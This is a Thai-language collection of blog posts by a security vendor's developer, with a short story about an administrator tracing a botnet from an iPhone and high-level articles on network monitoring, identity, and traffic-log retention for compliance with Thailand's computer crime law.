หนังสือพิมพ์ Thansettakit โครงการไทยช่วยไทยฯ
วันที่ 5-8 เมษายน 2552 หน้า 31
โครงการไทยช่วยไทยฯ นรัตน์ สาระมาน การรมการผู้จัดการ บริษัท โกลบอล เทคโนโลยี อินทิเกรเทด จำกัด หรือ SRAN ร่วมกับ ประพัฒน์ รัฐเลิศกานต์ กรรมการผู้จัดการ บริษัท แพลนเน็ต คอมนิวนิเคชั่น เอเชีย จำกัด และ ธงชัย พรรควัฒนชัย กรรมการบริหาร บริษัท เดอะแวลลู ซิสเตมส์ จำกัด ผู้จัดจำหน่ายสินค้าและให้บริการด้านไอทีรายใหญ่ในประเทศไทย เปิดตัสโครงการ “ไทยช่วยไทย ไอทีคุ้มค่าใช้ SRAN คุ้มครอง” มอบสิทธิพิเศษต่างๆ
ชายหาดที่เงียบสงบ “ได้ยินเสียงคลื่นกระทบฝั่ง ประกายแดดกระทบผิวน้ำทะเลเป็นระยิบระยับ หาดทรายขาวเม็ดละเอียดดูขาวสดใส กลุ่มก้อนเมฆก็สีขาว ตัดกับขอบฟ้าสีคราม เหนือท้องน้ำทะเล สาวน้อยในชุดบีกีนี่ก็ขาว โอ้ ชั่งมีความสุขแล้ว มนุษย์โลก” พัฒนึกในใจ ในวันพักผ่อนที่พัฒใช้สิทธิตนเอง ลาพักเหนื่อยในสถานที่ห่างไกล ผู้คนวุ่นวาย ไร้ความแออัดของยานพหนะ นายพัฒนั่งริมชายหาด บนเก้าอี้ขาว(อีก) และในมือที่ถืออยู่นั้นคือ iPhone พัฒฟังเพลงจาก iPhone โดยเเลือกเปิดเพลงที่เหมาะกับวันนี้ ชื่อเพลงว่า วันหนึ่งวันนั้น ของสุรสีห์ อิทธิกุล ในชุดกัลปาวสาน เป็นเพลงเก่าที่พึ่งหาพบกับเพื่อนนักสะสมเพลง นอกจากฟังเพลงแล้วซาบซึ้งกับบรรยายกาศชายทะเลอันแสนสุขแล้ว แต่ใจของพัฒก็ยังไม่ยุติความกังวล อาจเป็นเพราะมีจิตสำนึกในหน้าที่และมีความรับผิดชอบในสิ่งที่ตนเองได้รับมอบหมายงานมา นายพัฒจึงนั่งคิดถึงงานที่บริษัท เนื่องจากตนเองเป็นผู้ดูแลระบบเครือข่ายนี้เอง เป็นเรื่องที่ท้าทาย ว่าใครกันนะ ที่ทำให้บริษัทต้องถูกกล่าวหาว่าเป็นผูู้้โจมตีเว็บไซด์เว็บหนึ่ง หรือว่าจะเป็นเรื่องที่จัดฉากขึ้นจากฝีมือใครคนใดคนหนึ่งที่ไม่พึ่งประสงค์ดี
จะต้องทำอย่างไรอย่างหนึ่งเพื่อหาสาเหตุปัญหาเรื่องนี้ให้ได้
จึงทำการเปิด iPhone เพื่อที่จะเชื่อมต่ออินเตอร์เน็ต ที่เหลือแบตเตอรี่ไม่มาก ทำการค้นหาสัญญาณ Wireless LAN ไม่ช้าก็พบและทำการเกาะสัญญาณได้ พร้อมอุทานว่า “โชคดีแล้วเรา” พัฒไม่รอช้า ทำงานพร้อมเสียงเพลงที่ยังคงบรรเลงอยู่
ใกล้มือที่สุด คือ iPhone คลิกปุ่มเพื่อทำการ Slide unlock และคลิกเกาะ Wi-fi ที่ทางรีสอร์ทจัดให้
เมื่อทำการติดต่อระบบ Wi-fi ได้ก็ลองเปิดบราวเซอร์ดูว่ามีการเชื่อมต่ออินเตอร์เน็ตได้หรือไม่ เมื่อได้แล้วพัฒไม่รอช้า
มีลักษณะการบุกรุกที่เป็น DDoS เหมือนชนิดเครื่องภายในบริษัท XXX ติดเป็น Zombie อยู่ ซึ่งพัฒผ่านการอบรมจากทีมงาน SRAN ว่า Zombie คือเครื่องที่ติดโปรแกรมที่ไม่พึ่งประสงค์ (Malware) และ Zombie หลายตัว รวมเรียกว่า Botnet นั้นเอง แต่นี้เป็นเพียงขอสังเกตที่พัฒได้วินิฉัยเบื้องต้นเท่านั้น
ตอนนี้ พัฒทราบสาเหตุเบื้องต้นแล้ว และรู้ทั้ง IP Source และ IP Destination จากที่ SRAN ได้บันทึกไว้แล้ว
สามารถอ่านตอนเชื่อมจากนี้ได้ที่ กรณีศึกษา Data Hashing ตอนที่ 2
เพลงวันหนึ่งวัน ก็จบลงพร้อมกับการวิเคราะห์เครือข่่ายโดยใช้ SRAN SR-L ผ่านมือถือ iPhone
บรรยากาศดีๆ ชายทะเล ในหน้าร้อน กับเพื่อนคู่ใจ iPhone ก็สำราญอารมณ์ได้ จริงไหม
ก่อนหน้านี้ผมได้เขียนบทความการสร้างเครือข่ายตื่นรู้ ในตอนแรก การสร้างเครือข่ายตื่นรู้ (Energetic Network) ตอนที่ 1
และในบางส่วน ในนิตยสารไมโครคอมพิวเตอร์ ของสำนักพิมพ์ Se-ed ไปบางส่วนแล้ว
และเพื่อเป็นการสร้างความเข้าใจในเนื้อหามากขึ้้น ผมจึงอยากให้ศึกษาบทความผมเพิ่มเติ่มได้ เป็นบทเสริม ได้แก่ Log คืออะไร และ เทคนิคการเก็บ Log และอยากให้อ่านกรณีศึกษา การทำ Data Hashing ตอนที่ 1 และ ตอนที่ 2 จึงจะสามารถอ่านบทความนี้อย่างเข้าใจมากขึ้น
ต่อจากตอนที่แล้ว ..
4. องค์ประกอบ เครือข่ายตื่นรู้ (Energetic Network)
4.1 การจัดเก็บคลังข้อมูล (Inventory)
4.2 การระบุตัวตน (Identity)
4.3 การเฝ้าระวังและวิเคราะห์ผล (Monitoring & Analysis)
4.4 การควบคุม (Control)
4.5 การจัดเก็บเหตุการณ์เพื่อเปรียบเทียบตามมาตรฐาน (Compliance)
สิ่งที่เราต้องทำ
4.1 การจัดเก็บคลังข้อมูล (Inventory) ประกอบด้วย
การจัดเก็บคลังข้อมูลบุคคลากร โครงสร้างองค์กร หรือ โครงสร้างบริษัท แผนก พนักงาน
การจัดเก็บคลังข้อมูลแผนผังเครือข่ายคอมพิวเตอร์ ได้แก่ Network Diagram , IP อุปกรณ์ Router , Switch , Firewall , NIDS/IPS เป็นต้น
การจัดเก็บคลังข้อมูลเกี่ยวกับคอมพิวเตอร์ ได้แก่ ระบบปฏิบัติการ (Operating System) , IP , MAC Address , ชื่อเครื่องคอมพิวเตอร์ , ชื่อผู้ใช้งานเครื่องคอมพิวเตอร์ และ ฮาร์ดแวร์ต่างๆ ที่อยู่บนเครื่องคอมพิวเตอร์ในองค์กร
การจัดเก็บคลังข้อมูลซอฟต์แวร์ และแอฟิเคชั่น ได้แก่ ซอฟต์แวร์ต่างๆ ที่ลงบนเครื่องคอมพิวเตอร์ ในองค์กร
4.2 การระบุตัวตน (Identity) มี 4 องค์ประกอบดังนี้
– การระบุตัวตนในการเข้าระบบ (Authentication)
– การระบุสิทธิในการใช้งาน (Authorization)
– การระบุตัวตนผู้ใช้งาน (Accounting)
– การระบุข้อมูลหลักฐานผู้ใช้งาน (Auditing)
4.2.1 การระบุตัวตนในการเข้าระบบ (Authentication) การระบุตัวตนนี้มีด้วยกัน 3 ทางเลือกได้แก่
สิ่งที่คุณมี (Some thing you have) ได้แก่ สมาทการ์ด บัตรพนักงาน หรือ Token เป็นต้น
สิ่งที่คุณรู้ (Some thing you know) ได้แก่ รหัสผ่าน
สิ่งที่คุณเป็น (Some thing you are) ได้แก่ อวัยวะในร่างกาย ม่านตา ลายนิ้วมือ เป็นต้น
เพื่อให้การระบุตัวตนในการเข้าระบบ ได้อย่างปลอดภัยและยืนยันตัวตนได้ค่อนข้างถูกต้อง ควรทำเป็นแบบ Two Factor Authentication คือมี 2 ใน 3 ทางเลือกสำหรับการระบุตัวตน ส่วนใหญ่ใช้เป็น สิ่งที่คุณมี และ สิ่งที่คุณรู้ เป็น 2 Authentication factor เพื่อป้องกันปัญหาการระบุตัวตนในองค์กร หากมีระบบ DHCP ที่สามารถดู Log ได้ หรือทำ NAC (Network Access Control) หรือสร้าง LDAP บน Domain Controller ก็ไม่สามารถระบุตัวตนที่แท้จริงได้ หากไม่ทำ 2 Authentication Factor วิธีนี้จะเหมาะสมและปลอดภัย
4.2.2 การระบุสิทธิในการใช้งาน (Authorization) เป็นการระบุถึงสิทธิ ระดับการใช้งานไม่ว่าเป็นการใช้งานบนระบบเครือข่าย (Network) การใช้งานตามแอฟเคชั่นคอมพิวเตอร์ การมีสิทธิใช้คอมพิวเตอร์ในองค์กร การกำหนดระดับ Bandwidth การใช้งาน ในแต่ละกลุ่ม แต่ละรายบุคคลเป็นต้น
4.2.3 การระบุตัวตนผู้ใช้งาน (Accounting) เป็นการระบุถึงรายชื่อผู้มีสิทธิในการใช้งาน
4.2.4 การระบุข้อมูลหลักฐานผู้ใช้งาน (Auditing) เป็นการบอกประวัติการใช้งาน ลักษณะการใช้งานคอมพิวเตอร์บนระบบเครือข่ายคอมพิวเตอร์
4.3 การเฝ้าระวังและวิเคราะห์ผล (Monitoring & Analysis)
เป็นการเฝ้าสังเกตการพฤติกรรมการใช้งานบนระบบเครือข่าย แบ่งเป็น 3 องค์ประกอบได้ดังนี้
– การเฝ้าระวังข้อมูลที่ไม่ปกติ (Threat Data Traffic)
– การเฝ้าระวังข้อมูลที่ปกติ (Normal Data Traffic)
– การเก็บบันทึกข้อมูล (Recorder)
4.3.1 การเฝ้าระวังข้อมูลที่ไม่ปกติ (Threat Data Traffic) ซึ่งเป็นข้อมูลไม่พึ่งประสงค์ ได้แก่ ข้อมูลที่มีการติดเชื้อไวรัสคอมพิวเตอร์ ข้อมูลที่มีการระบาดของไวรัสคอมพิวเตอร์ หรือที่เรียกว่า Worm ข้อมูลที่มีผลกระทบกับธุรกิจ และการก่อการร้าย (Hacking) การโจรกรรมข้อมูลภายในองค์กร และภายนอกองค์กร การทำลายข้อมูล การดักข้อมูล หรือการแก้ไขข้อมูลให้มีความคลาดเคลื่อนจากความเป็นจริง ซึ่งทั้งหมดนี้ต้องมีระบบวิเคราะห์ภัยคุกคาม และออกรายงานผลให้รับทราบ เพื่อทำแผนรองรับเพื่อแก้ไขสถานะการณ์ฉุกเฉินดังกล่าว
4.3.2 การเฝ้าระวังการใช้อย่างปกติ (Normal Data Traffic) การใช้งานปกติสามารถแบ่งประเภทได้ดังนี้
4.3.2.1 การตรวจสภาวะการใช้งานอุปกรณ์ เครื่องแม่ข่าย แล้วมีการแสดงผลลัพธ์ที่บ่งบอกถึง ระดับการใช้ข้อมูลตาม Bandwidth , Protocol (HTTP , SMTP ,POP3 ,IMAP ,P2P ,IM เป็นอย่างน้อย)
การแจ้งผลเตือนระดับการใช้งาน เช่น แจ้งค่าตาม Flow Network / Collector จาก Protocol ICMP , SNMP ได้แก่ ค่า CPU , RAM และ Response Time
4.3.2.2 การใช้งานตาม Application Protocol ที่สำคัญ ได้แก่
การใช้งานอินเตอร์เน็ทโดยการเปิดเว็บบราวเซอร์ ผ่าน Protocol HTTP ต้องมีระบบเฝ้าระวัง และวิเคราะห์ เพื่อตรวจสอบลักษณะการใช้งาน ตาม Source / Destination IP หรือ Domain วันที่ เวลาที่ใช้งานงาน รูปแบบการติดต่อว่าเป็นแบบ GET หรือ POST และ Path ที่เปิดเว็บนั้น
การใช้งานอินเตอร์เน็ทโดยการใช้บริการอีเมลล์ ผ่าน Protocol SMTP , POP3 , IMAP ต้องมีระบบเฝ้าระวัง และวิเคราะห์ เพื่อตรวจสอบลักษณะการใช้งาน ตาม Source / Destination IP หรือ Domain วันที่ เวลาที่ใช้งาน รูปแบบการติดต่อว่าเป็นแบบ รับ หรือ ส่ง อีเมลล์ ชื่อหัวเรื่องอีเมลล์ ชื่อเอกสารไฟล์ที่แนบมากับอีเมลล์
การใช้งานอินเตอร์เน็ทโดยใช้บริการสนทนาออนไลท์ ผ่าน Protocol IM ชนิดต่างๆ ต้องมีระบบเฝ้าระวัง และวิเคราะห์ เพื่อตรวจสอบลักษณะการใช้งาน ตาม Source / Destination IP หรือ Domain วันที่ เวลาที่ใช้งาน รูปแบบการติดต่อ จากโปรแกรมชนิดใด เช่น Yahoo , MSN , ICQ , IRC เป็นต้น
การใช้งานอินเตอร์เน็ทโดยใช้บริการอื่นๆ ได้แก่ ลักษณะการใช้ VoIP และ P2P ต้องมีระบบเฝ้าระวังและวิเคราะห์ เพื่อตรวจสอบลักษณะการใช้งาน ตาม Source / Destination IP หรือ Domain ระบุวันที่ เวลาที่ใช้ รูปแบบการติดต่อ จากโปรแกรมชนิดใด เช่น SkyP , P2P Program เป็นต้น
4.3.3 การเก็บบันทึกข้อมูล (Recorder) เพื่อเก็บบันทึกข้อมูลทั้งที่เป็นข้อมูลจราจรที่ปกติ (Normal Data Traffic) และ ข้อมูลจราจรที่ไม่ปกติ (Threat Data Traffic) ที่เป็นรูปของ Raw Data หรือลักษณะที่สามารถดูข้อมูลที่เก็บบันทึกได้ ผ่านทาง Data Base เทคโนโลยี หรือจะเป็น Text files ก็ได้ ในการเก็บบันทึกควรมีการแสดงค่ายืนยันว่ามีความถูกต้อง และแก้ไขไม่ได้นั้น มีกระบวนการเก็บผ่านนโยบายขององค์กร (Security Policy) วิธีปฏิบัติของผู้ปฏิบัติงาน (Operation Security) และมีค่ายืนยันความไม่เปลี่ยนเปลี่ยน (Check sum) เพื่อยืนยันว่า file นั้นไม่มีการแก้ไขหรือเปลี่ยนแปลงได้ (Integrity) ต่อไป
4.4 การควบคุมข้อมูล (Control Data Traffic) ประกอบด้วย 3 ส่วนดังนี้
4.4.1 การควบคุมป้องกันภัยคุกคามที่เกิดขึ้น (Threat Protection) เพื่อป้องกันภัยคุกคาม ต่างๆ ได้แก่ ไวรัสคอมพิวเตอร์ การโจมตีระบบ การเข้าถึงข้อมูลที่ไม่เหมาะสม การโจรกรรมข้อมูล สามารถมองการป้องกันนี้ได้เป็น 2 ส่วน คือ
4.4.1.1 การป้องกันระบบเครื่องคอมพิวเตอร์ (Host Base Protection) เป็นการสร้างระบบป้องกันภายในเครื่องเพื่อ ป้องกันไวรัส คอมพิวเตอร์ (Host Base Anti virus) และภัยคุกคามอื่นๆ (Anti Malware) สร้างความปลอดภัยให้กับเครื่องคอมพิวเตอร์ (Computer Hardening) ไม่ว่าเป็น เครื่องแม่ข่าย หรือ เครื่องลูกข่าย มีระบบตรวจสอบ Patch และการอัพเดทระบบปฏิบัติการเพื่อมิให้เกิดช่องโหว่ ซึ่งอาจมีผลต่อการเข้าถึงระบบได้ในอนาคต
4.4.1.2 การป้องกันระบบเครือข่ายคอมพิวเตอร์ (Network Base Protection) เป็นการสร้างระบบป้องกันภัยคุกคามทางเครือข่ายคอมพิวเตอร์ เทคโนโลยีป้องกันภัยในส่วนได้แก่ ระบบ Firewall , NIPS (Network Intrusion Prevention System) หรือ Proxy Filtering เป็นต้น
4.4.2 การควบคุมเพื่อจำกัดขอบเขตการใช้งานข้อมูลจราจร (Limitation Data Traffic) เพื่อเป็นการกำหนดข้อมูลจราจร ทั้งส่วนระบบเครือข่ายคอมพิวเตอร์ (Network Base) และ ระบบภายในเครื่องคอมพิวเตอร์ (Host Base) ในส่วนการจำกัดขอบเขตการใช้งานข้อมูลจราจรฝั่งระบบเครือข่ายคอมพิวเตอร์ จะพิจราณาการใช้งาน Bandwidth , และ Application ที่ได้มีการใช้งานอยู่เป็นประจำ ส่วนในฝั่ง Host Base หรือเครื่องคอมพิวเตอร์ ของผู้ใช้งานจะมีการจำกัดขอบเขตการใช้งานตามนโยบายความมั่นคงปลอดภัย เพื่อใช้งานตามความเหมาะสมตามบทบาทและหน้าที่ของผู้ปฏิบัติงาน
4.4.3 การควบคุมเพื่อกักสิ่งผิดปกติ (Jail Data) ไม่ให้เกิดความเสียหายแก่ระบบเครือข่ายและการปฏิบัติงานในปัจจุบัน
สำหรับการกักขังภัยคุกคาม สามารถแบ่งออกได้ ดังนี้
4.4.3.1 การกักข้อมูลที่ผิดปกติ หรือ ไม่เหมาะสม ผ่านทางระบบเครือข่ายคอมพิวเตอร์ โดยจะทำการควบคุมผ่าน Security Gateway เส้นทางลำเลียงข้อมูลในส่วนหลักขององค์กร ได้แก่ระบบ Firewall , NIPS หรือกำหนดผ่าน VLAN เพื่อแยกภัยคุกคามไม่เข้าสู่เส้นทางลำเลียงข้อมูลที่ปกติ
4.4.3.2 การกักข้อมูลที่ผิดปกติ หรือ ไม่เหมาะสม บนเครื่องคอมพิวเตอร์ กำหนดจากเทคโนโลยี Domain Controller และการกำหนดจาก NAC (Network Access Control) เพื่อแยกแยะเครื่องคอมพิวเตอร์ที่ผิดปกติ อยู่ในช่องทางที่ไม่สามารถแพร่เชื้อไวรัส หรือ ภัยคุกคามชนิดอื่นๆ ได้
4.5 การจัดเก็บเหตุการณ์เพื่อเปรียบเทียบตามมาตรฐาน (Compliance) แบ่งเป็น 2 ส่วนได้แก่
4.5.1 การจัดเก็บเหตุการณ์เพื่อเปรียบเทียบตามมาตรฐานสากล (Log Compliance) เกิดจากการรวบรวม ค่า syslog ที่เกิดขึ้นจากอุปกรณ์เครือข่าย เครื่องแม่ข่าย และระดับเครื่องลูกข่าย รวบรวมสู่ศูนย์กลาง หรือ จะใช้วิธี Flow Collector เพื่อตรวจจับข้อมูลจราจรที่ดูถึงลักษณะการใช้งานได้ บนระบบเครือข่าย และรับค่า Syslog ที่สำคัญมา เพื่อทำการแยกแยะข้อมูลและจับเปรียบเทียบข้อมูลหรือที่เรียกว่า Correlation Log เพื่อจัดหมวดหมู่มาตรฐาน 4 ประเภท ซึ่งผมจะได้ขอกล่าวต่อไปในตอนหน้า
นนทวรรธนะ สาระมาน
Nontawattana Saraman
SRAN Dev
21/03/2551
จากตอนที่แล้วผมได้เขียนถึงความหมายของ Log มาครั้งนี้ผมคงต้องขอขยายความเพิ่มเติมถึงเทคนิคในการเก็บบันทึกข้อมูลจราจร (Data Traffic) ที่เกิดขึ้นแล้ว ซึ่งเรียกว่า Log ก่อนที่ผมจะนำทุกท่านไปสู่แนวคิดการสร้างเครือข่ายตื่นรู้ (Energetic Network) ตอนที่ 2 ผมอยากจะเขียนถึงเทคนิคในการเก็บบันทึกข้อมูลจราจร เสียก่อน เนื่องจากหลายครั้งที่ได้ไปบรรยาย จากทาง SIPA บ้างหรือ GITS บ้าง มักจะถามว่า เก็บบันทึกข้อมูล (Log) แบบไหนพอเพียงแล้ว แบบไหนไม่ยังถือว่าไม่พอ
ก่อนจะรู้ได้ เก็บแบบไหน พอ ไม่พอ นั้น อยากให้ทราบว่า สิ่งที่ว่าพอ และเหมาะสม ไม่เพียงแต่เฉพาะทำให้ถูกต้องตาม พ.ร.บ ว่าด้วยการกระทำผิดทางคอมพิวเตอร์ เพียงอย่างเดียว แต่ก็มีประโยชน์สำหรับนายจ้าง ของบริษัทนั้นๆ ซึ่งทำให้ทราบถึงพฤติกรรมการใช้งานอินเตอร์เน็ทของลูกจ้างได้อีกด้วย และที่สำคัญหากเกิดกรณีที่ต้องถึงมือเจ้าหน้าที่พนักงาน หรือเจ้าหน้าที่ตำรวจ ก็สะดวกในการสืบหาข้อมูล สืบหาหลักฐาน และสามารถหาผู้กระทำความผิดมาลงโทษได้อย่างมีประสิทธิภาพ ผมจึงถือโอกาสนี้แสดงความคิดเห็นในเรื่องเทคนิตการเก็บบันทึกข้อมูลจราจร
ก่อนอื่นขอทำความเข้าใจ ความหมาย Log อีกครั้ง Log คือ ข้อมูลที่เกิดขึ้นแล้ว และมีส่งผลให้เกิดการเปลี่ยนแปลงในปัจจุบัน
หากบอกว่าไม่มีการเปลี่ยนแปลงเลย นั้น คงไม่ใช่ เมื่อพิจารณาให้ดี จะพบว่าทุกอย่างมีการเปลี่ยนแปลง ใครยังไม่อ่านก็ลองกลับไปดูที่ บทความ Log คืออะไร
สำหรับผู้ดูแลระบบแล้ว รู้ว่าภัยคุกคาม การหมิ่นประมาท การก่อกวน การทําาลาย ข้อมูลที่ไม่พึ่งประสงค์
มักเกิดจากการใช้งาน อินเตอร์เน็ท หนีไม่พ้นจาก Application Protocol
ดังนี้ Web , Mail , Chat , Upload / Download (FTP , P2P) , VoIP ดังนั้นการเก็บบันทึกข้อมูลจราจร นั้นควรสนใจ พิจารณา Application Protocol เหล่านี้ให้มาก
หลักการพิจารณา ให้พิจารณาตามห่วงโซ่ของเหตุการณ์ (Chain of Event)
Who : ใคร
What : ทําาอะไร
When : เมื่อไหร่
Where : ที่ไหน
Why : อย่างไร
จากนั้นแล้วเพื่อเป็นการป้องกันหลักฐานนั้นไม่ให้เกิดการเปลี่ยนแปลง เราควรเก็บบันทึกหลักฐาน (Chain of Custody) คือ เก็บบันทึกข้อมูลจาก Log นั้น ซึ่งจะมีการเก็บบันทึกได้ดังนี้
– การบันทึกข้อมูลจราจร จากพฤติกรรมการใช้งาน (Log Traffic) คือ การใช้งาน Bandwidth ทั้งภายในและภายนอกที่มีการติดต่อสื่อสาร ลักษณะการการไหลเวียนข้อมูลตาม Application Protocol ทั้งภายในและภายนอกที่มีการติดต่อสื่อสาร
– การบันทึกการระบุตัวตน (Log Identity) คือ เก็บข้อมูลรายชื่อผู้มีสิทธิใช้ระบบ เวลาการใช้งานเมื่อเข้าถึงระบบ การมีสิทธิในการใช้ระบบนั้นๆ
– การบันทึกเหตุการณ์ (Log Event) คือ ลักษณะ Payload ที่ต้องใช้ความสามารถของเทคโนโลยีระดับ Deep Packet Inspection เพื่อมาพิจาราณาดูเนื้อหาภายในการติดต่อสื่อสารนั้น ว่าเป็นข้อมูลที่ปกติ (Normal Event) หรือ ข้อมูลที่ไม่ปกติ (Threat Event) ซึ่งข้อมูลเหล่านี้หากไม่ปกติมักมีการแอบแฝงของภัยคุกคามต่างๆ เช่น ไวรัสคอมพิวเตอร์ อีเมลขยะ หรือ การบุกรุกระบบต่างๆ นานา
ผมได้เขียนตารางในการพิจารณา เพื่อใช้สำหรับ สืบสวนสอบสวนหาลักษณะเหตุการณ์จากการบันทึกข้อมูลจราจร ได้ดังตรารางนี้คือ
Application Protocol ที่สนใจในตรารางนี้คือ Web : HTTP / HTTPS , Mail : SMTP / POP3 / IMAP ,Chat : MSN / Yahoo / IRC / ICQ อื่นๆ
เทคนิคในการเก็บบันทึกข้อมูลจราจร จึงประกอบด้วยดังนี้
แบบที่ 1. Local Log คือเก็บบันทึกข้อมูลบนเครื่องแม่ข่าย (Server) เครื่องลูกข่าย (Client) นั่นๆเอง
ข้อดี : มีความละเอียดของข้อมูลสูง มีปัญหาเรื่องความเข้าใจผิดจากสิ่งที่พบ (False Positive) น้อยมาก
ข้อเสีย : ดูลําาบาก ใช้งานยาก ไม่รวมศูนย์ ข้อมูลที่ได้ไม่สามารถยืนยันว่าถูกต้อง เนื่องจากอาจจะมีการแก้ไข Log files ที่เกิดขึ้นได้
แบบที่ 2. Proxy Log คือเก็บโดยใช้เทคโนโลยี Proxy อาจทำเป็น Transparent (ติดตั้งแบบ Gateway mode) เพื่อเป็นตัวกลางในการติดต่อสื่อสาร
ข้อดี : ข้อมูลในการเก็บบันทึกมีความละเอียด ติดตั้งสะดวก ง่ายในการออกแบบ
ข้อเสีย : เก็บได้เฉพาะบาง Application Protocol หากทําาให้ครบ ก็ต้องใช้งบประมาณสูง
ใช้ Storage มาก , ข้อมูลที่ได้ไม่สามารถยืนยันว่าถูกต้อง* , มีความเสี่ยงในการติดตั้ง เนื่องจากต้องติดตั้งแบบ Gateway อาจส่งผลกระทบกับระบบเครือข่ายหากมีการรองรับ Bandwidth และ Concurrent Session ไม่พอ
แบบที่ 3. Remote Syslog หรือเรียกว่า Syslog Server และหากพัฒนากลายเป็นระบบ SIEM (Security Information Event Management) ก็ใช้หลักการณ์เดียวกัน
ข้อดี : ละเอียด หากติดตั้งครบถ้วน สะดวกในการประมวลผลค่าเหตุการณ์ได้ (Event Log)
จัดเปรียบเทียบตามมาตราฐานต่างๆได้ (Compliance)
ข้อเสีย : ติดตั้งลําาบาก เพราะต้องรับค่า syslog จากอุปกรณ์อื่นๆ มาที่ตัวเอง
ใช้ Storage มาก , หากเป็น SIEM มีค่าใช้จ่ายสูง เพราะคิดค่าส่ง syslog ตาม Devices
การออกแบบ ต้องใช้เวลานาน หากไม่สามารถรับ syslog จากเครื่องต่างๆ ได้ไม่ครบถ้วน จะเสียเวลาเปล่า และไม่ก่อประโยชน์
ผมมอง SIEM หรือ SIM เหมือน การติดตั้งระบบ SAP สมัยก่อน ดูเหมือนดีแต่สำหรับผู้ขาย SI (System Integrated) แล้ว อาจดูเหนื่อยเสียหน่อย เนื่องจากการออกแบบและติดตั้ง (Implementation) ต้องใช้เวลานาน และต้องใช้วิศวกร (Engineer) ที่มีความรู้สูง
แบบที่ 4. Authentication log หลายคนคิดว่าวิธีเพียงพอแล้ว แต่ในความเป็นจริงยังไม่พอ นั่นคือเป็นการเก็บบันทึกเฉพาะส่วนการ Login , การลงทะเบียนเพื่อใช้งานระบบ
ข้อดี : สะดวกในการใช้งาน , ไม่เปลือง Storage
ระบุตัวตนได้ ระดับหนึ่ง หากเป็น 2 factor authentication ก็จะดีมาก
ข้อเสีย : ไม่สามารถทราบถึงลักษณะการใช้งาน หรือ ค่า Event Payload ได้ ,
มีความเสี่ยงในการติดตั้ง เนื่องจากติดตั้ง หากเป็นชนิด In-line หรือ ชนิดต้องเป็น Identity Server ต้องรองรับเครือข่ายขนาดใหญ่ ที่ทุกเครื่องต้องทำการ Join ระบบนี้ก่อนเริ่มต้นทุกครั้งเพื่อจะเรียกใช้ Application Protocol ต่างๆ , ข้อมูลที่ได้ไม่สามารถยืนยันว่าถูกต้อง*
แบบที่ 5. Flow Collector Network ใช้หลักการณ์ Passive Monitoring เฝ้าระวังผ่านความสามารถอุปกรณ์เครือข่าย
ข้อดี : ติดตั้งสะดวก ไม่เกิดความเสี่ยงในการติดตั้ง สะดวกในการใช้งาน ราคาประหยัด
ไม่เปลือง Storage
ข้อเสีย : ข้อมูลที่ได้รับไม่ละเอียด , ข้อมูลที่ได้ไม่สามารถยืนยันว่าถูกต้อง*
หากต้องการทราบค่า Event Payload ต้องใช้เทคโนโลยี IDS (Intrusion Detection System) มาเสริม
* หากระบบใดได้มีการติดตั้งค่าตรวจสอบ Integrity / Checksum ของค่า Log จะทําาให้
ข้อมูลที่ได้รับยืนยันว่าถูกต้องได้ ไม่สามารถแก้ไขได้ ที่สำคัญหากเกิดเหตุการณ์ไม่คาดคิดแล้ว การนำ Log ที่ได้ไปพิจาราณาในชั้นศาล เพื่อดำเนินความทางกฏหมาย Log นั้นไม่ได้มีการทำ Integrity แล้วก็ไม่สามารถยืนยันได้ว่ามีความถูกต้อง เพราะอาจมีการแก้ไข Log ดังกล่าวก็ได้ ดังนั้นผู้ที่รับติดตั้งระบบ SIEM / SIM นี้ควรพิจารณาในส่วนนี้ด้วยครับ หากไม่ได้ปฏิบัติการลงทุนมากเกินความจำเป็นไปอาจสูญเปล่า เพราะศาลไม่รับฟ้องได้ครับ
ทั้งหมดที่กล่าวคงเห็นภาพมากขึ้นนะครับ
สำหรับผมแล้วเป็นเรื่องที่ท้าทายมาก สำหรับการออกแบบชิ้นงานหนึ่งที่ประยุกต์ ข้อดีและข้อเสีย จากรูปแบบทั้ง 5 ในการเก็บบันทึกข้อมูลจราจรนี้ มารวมเป็นหนึ่งเดียว เพื่อความสะดวก ในการใช้งานสำหรับหน่วยงานต่างๆ
ผมเสนอแนวทางการสร้าง Hybrid Log Recorder ครับ
จุดประสงค์ คือ
1. ลดปัญหา ความซับซ้อนในการติดตั้ง (Implement)
2. ลดปัญหาค่าใช้จ่าย (License) ที่ต้องใช้เทคโนโลยีจําานวนหนึ่ง เพือตอบโจทย์ Who , What , Where , When , Why ที่เกิดขึนจากการรับส่งข้อมูล้
3. ลดปัญหาการจัดเก็บบันทึกข้อมูลจราจร ที่ต้องใช้เนื้อจําานวนมาก (Storage)
4. ลดความเสี่ยงที่เกิดขึนจากการออกแบบ (Design) และการติดตั้ง้
5. เก็บบันทึกข้อมูลจราจรตาม หลักเกณฑ์ที่ประกาศจากกระทรวง ICT คือทําา
Centralized Log / Data Archive / Data Hashing
นับเป็นความภูมิใจ ที่เราได้นำเทคโนโลยี Hybrid Log นี้ไปเสนอที่ประเทศเยอรมันนี ในงานระดับโลก CeBIT อีกด้วยครับ http://www.sran.net/archives/207
การนำ Hybrid Log ไปใช้จะเป็นอย่างไรนั้น ผมได้เปิดเผยลงใน http://www.sran.net/archives/200 ไปบ้างแล้ว หากต้องการทราบรายละเอียดเชิงออกแบบ (Design) เชิญทีมงาน SRAN บรรยายได้โดยติดต่อที่บริษัท Global Technology Integrated 02-9823339 ext 11 จะมีผู้ประสานงานต่อไป
เมื่อวันที่ 3 มีนาคม 2551 ผมได้รับเกียรติจากทาง สำนักบริการเทคโนโลยีสารสนเทศภาครัฐ (สบทร.) ให้ขึ้นบรรยาย เทคโนโลยีที่ใช้ในการเก็บบันทึกข้อมูลจราจร เพื่อให้สอดคล้องกับ พ.ร.บ. ว่าด้วยการกระทำผิดเกี่ยวกับคอมพิวเตอร์ 2550 ผมนำเสนอเทคโนโลยี Hybrid Log Recorder เนื่องจากการบรรยาย มีเวลาให้ผมได้บรรยายไม่มากนัก คือประมาณ 15-20 นาที ซึ่งขอบอกตรงๆ หากภาคเอกชนเชิญผมไปบรรยาย และให้เวลาเช่นนี้ ผมคงไม่รับ ผมอยากบรรยายสักครึ่งวันเป็นอย่างน้อย เนื่องจากการพูดผมติดเครื่องช้า นี้ก็เพราะภาครัฐที่เป็นส่วนสำคัญของประเทศ ผมจึงตัดสินใจมา ถึงแม้จะมีบางประเด็นที่ผมไม่สามารถอธิบายได้ในช่วงเวลาสั้นๆ ผมจึงนำมาลง blog เพื่อสร้างความเข้าใจเป็นตัวอักษรได้อ่านกัน ก่อนที่จะเรียนรู้ถึงกรรมวิธีการเก็บบันทึกข้อมูลจราจรอย่างไร นั้น 